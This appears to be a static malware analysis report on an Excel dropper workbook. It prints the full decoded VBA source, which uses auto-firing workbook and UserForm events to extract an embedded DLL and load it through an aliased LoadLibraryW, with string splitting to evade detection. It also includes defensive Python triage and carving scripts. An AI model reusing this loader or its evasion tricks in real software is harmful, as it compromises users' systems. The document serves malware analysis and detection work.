Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4936c1fdd3b1fddb…

MALICIOUS

Office (OLE)

Size: 718.5 KB | Created: 2019-08-30 09:14:50 | Authoring application: Microsoft Excel | First seen: 2020-02-04
MD5: 2dd46db7b5683a3c75716fe6d30d71aa | SHA-1: b3a07e75ebd564267c1521798850d9b3f78c9b8b | SHA-256: 4936c1fdd3b1fddb7197838ddd342fbc2dd155dcd127891c9a16c146fcf8b9b9
Risk score: 500

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1027.009 Embedded Payloads T1129 Shared Modules (the macro source shows no download, so T1105 Ingress Tool Transfer is not supported by this sample; the second stage is carried inside the workbook)

The sample is an Excel workbook whose VBA project starts from Workbook_Activate rather than AutoOpen/Auto_Open, checks that UserForm1 is not yet visible, calls Module1.AppStart, and shows UserForm1; the form's UserForm_Activate event then runs ReplaceCurrentModule, so the payload path is an auto-firing UserForm event chained off a workbook event. Nothing is downloaded. ReplaceCurrentModule copies the workbook's sheets into a new workbook, saves it as .xlsx (FileFormat 51) under a directory taken from an environment variable (UserForm3.TextBox1.Tag, expanded via WScript.Shell.ExpandEnvironmentStrings), copies it to a .zip name, and uses Shell.Application to pull xl\embeddings\oleObject1.bin out of the archive. NewValuje then scans that file byte by byte for the DOS-header prefix MZ 0x90 (built as CByte(40+37), CByte(40+50), CByte(40+104)) and copies a fixed-length slice starting at the 1st occurrence (32-bit Office: 278528 bytes, written as templ1.dll) or the 2nd (64-bit Office: 233984 bytes, templ2.dll) into a WScript.Shell SpecialFolders path whose name is stored in UserForm3.TextBox2.Tag (the source comment says LocalAppData). The DLL is loaded with LoadLibraryW, declared under the alias Wakeup2, and its Wakeup export is called. String literals are split to defeat keyword matching ("Shell." + "Application", ".d" + "ll", "oleObj" + "ect*.bin"), and most of Module1 is inert ADO test-harness code (ITestModule_*, adolvl0.* ProgIDs) carried as padding. Three points the heuristics below overstate: WScript.Shell is used only for environment-variable expansion and SpecialFolders lookup, not to spawn a process; the ExecuteExcel4Macro calls are a MESSAGE() status-bar call in AppStart and an unreferenced COUNTA routine in Module3.test, not decoded XLM; and VirtualAlloc appears only as a string reference (most likely inside the embedded PE, which is an inference), not in the VBA, which contains no shellcode.

Heuristics 11

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
    CCount = Application.ExecuteExcel4Macro(Temp1)
    Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
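The stager heuristics above key on auto-exec names and on literal keywords, which is exactly what this sample sidesteps by using Workbook_Activate/UserForm_Activate and by splitting its string literals. The script below is an added example (not the report generator's heuristic code) of a triage pass that first folds VBA string concatenations and line continuations and only then matches: auto-firing event handlers, Declare statements that import from a non-system DLL or hide a Win32 API behind an alias, CreateObject ProgIDs, and references to xl\embeddings. Its input is a set of lines copied from the macros.bas artifact extracted from this sample; the rule names and the list of system DLLs are the example's own choices.

```python
"""Keyword triage over decoded VBA that first undoes the literal splitting this
sample uses (added example; not the report generator's heuristic code)."""
import re

# Input: lines copied from the macros.bas artifact extracted from this sample.
SAMPLE_VBA = r'''
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If
End Sub
    Public Declare PtrSafe Function Wakeup Lib _
        "templ2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Set WaitForSingle = CreateObject("WScript.Shell")
Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
'''

# Event handlers Office fires without user action (list chosen for this example).
AUTO_EVENTS = r"Workbook_Activate|Workbook_Open|Auto_Open|UserForm_Activate|UserForm_Initialize"
RE_EVENT = re.compile(rf"^\s*(?:Private\s+|Public\s+)?Sub\s+({AUTO_EVENTS})\b", re.I | re.M)
RE_DECLARE = re.compile(r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
                        r'(?:\s+Alias\s+"(\w+)")?', re.I)
RE_COM = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.I)
RE_EMBED = re.compile(r'"([^"]*(?:embeddings|oleObject)[^"]*)"', re.I)
RE_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')
SYSTEM_LIBS = {"kernel32", "user32", "advapi32", "ole32", "shell32", "gdi32"}


def join_continuations(src: str) -> str:
    """Glue VBA ' _' line continuations so a Declare split over two lines matches."""
    return re.sub(r"[ \t]_\r?\n[ \t]*", " ", src)


def fold_literals(line: str) -> str:
    """Repeatedly merge "a" + "b" and "a" & "b" into "ab" so split keywords reappear."""
    while True:
        new = RE_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
        if new == line:
            return new
        line = new


def triage(src: str) -> list:
    """Return ordered, de-duplicated (rule, detail) findings for a decoded VBA project."""
    text = join_continuations(src)
    findings = [("AUTO_EVENT", m.group(1)) for m in RE_EVENT.finditer(text)]
    for raw in text.splitlines():
        line = fold_literals(raw)
        for name, lib, alias in RE_DECLARE.findall(line):
            lib_base = lib.lower().rsplit(".dll", 1)[0]   # 'kernel32' and 'kernel32.dll' both count
            if alias:
                findings.append(("DECLARE_ALIAS", f"{name} <- {lib}!{alias}"))
            elif lib_base not in SYSTEM_LIBS:
                findings.append(("DECLARE_NONSYSTEM", f"{name} <- {lib}"))
        for progid in RE_COM.findall(line):
            findings.append(("COM_OBJECT", progid))
        for path in RE_EMBED.findall(line):
            findings.append(("EMBEDDING_REF", path))
    seen, ordered = set(), []
    for f in findings:
        if f not in seen:
            seen.add(f)
            ordered.append(f)
    return ordered


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_VBA):
        print(f"{rule:18} {detail}")
```

On the sample lines the raw CreateObject regex sees only WScript.Shell; after folding it also reports Shell.Application, and the joined Declare shows Wakeup bound to templ2.dll next to Wakeup2 aliased onto kernel32!LoadLibraryW, which is the whole loader in two findings.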

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12299 bytes
SHA-256: 18ba8f8fff6bc105e5d906d9732724801d67189940c0e4558cd5adf8ab75f370
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "templ2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "templ1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)
    
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F02DE064-F46B-4DAD-851C-F1EBF29A0CB8}{9E877C85-1A96-4569-A97A-EFC2CFCC11E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"




Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\dependence" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\templ1"
    API_LENGTH = 278528
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\templ2"
    API_LENGTH = 233984
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs NameFav, FileFormat:=50 + 1
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Wakeup = Wakeup2(nm)
        Wakeup

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{5F2F9417-F748-4281-A658-430F0D5AFC5F}{A8EEB77D-150C-4D39-848F-8294E6FFC570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_0000305f.exe | embedded-pe | Office MZ+PE at offset 0x305F | 723361 bytes
SHA-256: 3d8df83fd11577cdf825542c7920a8019514677557c956d9d05a42c4907c3c5c
Note: 0x305F (12,383) + 723,361 = 735,744 bytes = 718.5 KB, so this carve runs from the first MZ header to the end of the file and is the raw tail of the container, not a single image; the macro itself selects its DLL by counting MZ 0x90 occurrences inside the extracted oleObject1.bin and taking the 1st or 2nd one.
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD01295E87/Ole10Native | 525865 bytes
SHA-256: b1667603f4e8498b82e0852c604f2ecebe3f917fe11823189b70bc5479dfc3c4
Note: 525,865 bytes is consistent with the stream carrying both builds the macro can select (278,528 + 233,984 = 512,512 bytes) plus the Ole10Native header; which is an inference from the sizes, not something the static pass verified.
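To hash and scan the second stage without opening the workbook, an analyst needs the same slice the macro takes. The script below is an added example (not code from the sample or from the report generator) that re-implements the NewValuje()/ReplaceCurrentModule() carve: it scans a blob for MZ 0x90 exactly the way the VBA loop does (one Get per byte, no rewind after a partial match), takes the 1st or 2nd hit with the macro's fixed lengths, and reads the PE machine field to confirm which hit is the x86 and which the x64 build. The container it runs on by default is constructed for the example; point it at the oleObject1.bin you extract from the re-saved .xlsx, or at the Ole10Native stream above, to carve the real DLLs.

```python
"""Offline re-implementation of the payload carve in NewValuje()/ReplaceCurrentModule()
(added example; not code from the sample or from the report generator)."""
import sys

MZ_PREFIX = b"MZ\x90"                      # CByte(40+37), CByte(40+50), CByte(40+104) in the macro
X86_LENGTH, X64_LENGTH = 278528, 233984    # API_LENGTH for templ1.dll (1st hit) / templ2.dll (2nd hit)
IMAGE_FILE_MACHINE = {0x014C: "x86", 0x8664: "x64"}


def mz_offsets_as_macro_sees(data: bytes) -> list:
    """Offsets of MZ\\x90 found the way the VBA loop finds them.

    The macro reads one byte per Get and never rewinds after a partial match, so
    an 'MMZ\\x90' run is not a hit for it even though bytes.find() reports one.
    Reproducing that quirk matters: the 2nd occurrence the malware picks on
    64-bit Office can differ from the 2nd occurrence a naive search reports.
    """
    hits, i, n = [], 0, len(data)
    while i < n:
        b, i = data[i], i + 1
        if b != MZ_PREFIX[0] or i >= n:
            continue
        b, i = data[i], i + 1
        if b != MZ_PREFIX[1] or i >= n:
            continue
        b, i = data[i], i + 1
        if b == MZ_PREFIX[2]:
            hits.append(i - 3)
    return hits


def carve_nth(data: bytes, occurrence: int, length: int):
    """`length` bytes from the `occurrence`-th hit (1-based), or None if there is no such hit.
    Like the macro, a hit near the end yields a short blob rather than an error."""
    hits = mz_offsets_as_macro_sees(data)
    if not 1 <= occurrence <= len(hits):
        return None
    start = hits[occurrence - 1]
    return data[start:start + length]


def pe_machine(blob: bytes):
    """Architecture from the COFF Machine field, or None if the blob is not a PE image."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    if blob[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = int.from_bytes(blob[e_lfanew + 4:e_lfanew + 6], "little")
    return IMAGE_FILE_MACHINE.get(machine, hex(machine))


def carve_both(data: bytes) -> dict:
    """Recover both builds the macro can select, keyed by the filename it would write."""
    out = {}
    for name, occ, length in (("templ1.dll", 1, X86_LENGTH), ("templ2.dll", 2, X64_LENGTH)):
        blob = carve_nth(data, occ, length)
        if blob is not None:
            out[name] = (blob, pe_machine(blob))
    return out


def _fake_pe(machine: int, size: int) -> bytes:
    """Constructed stand-in for a payload DLL: valid DOS and PE headers over padding."""
    hdr = bytearray(b"MZ\x90\x00" + b"\x00" * 0x3C)   # 0x40-byte DOS header
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")      # e_lfanew -> PE signature right after it
    hdr += b"PE\x00\x00" + machine.to_bytes(2, "little")
    return bytes(hdr).ljust(size, b"\xCC")


# Constructed container standing in for oleObject1.bin: an 'MMZ\x90' decoy that a
# naive search counts, then the x86 build, then the x64 build.
SAMPLE_X86 = _fake_pe(0x014C, 512)
SAMPLE_X64 = _fake_pe(0x8664, 384)
SAMPLE_CONTAINER = (b"\x00" * 8 + b"MMZ\x90" + b"\x00" * 4
                    + SAMPLE_X86 + b"\xEE" * 16 + SAMPLE_X64)

if __name__ == "__main__":
    # python carve.py <oleObject1.bin or ole10native_00.bin>; with no argument it runs on the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CONTAINER
    for name, (blob, arch) in carve_both(data).items():
        print(f"{name}: {len(blob)} bytes, machine={arch}")
```

Because the macro's fixed lengths are hard-coded, a real carve should end exactly on a PE image boundary; if pe_machine() reports x86 for the 1st hit and x64 for the 2nd, the slices line up with what Wakeup2 (LoadLibraryW) would have loaded on each Office bitness, and the two blobs can be hashed and submitted as the actual second stage rather than the 723,361-byte tail listed above.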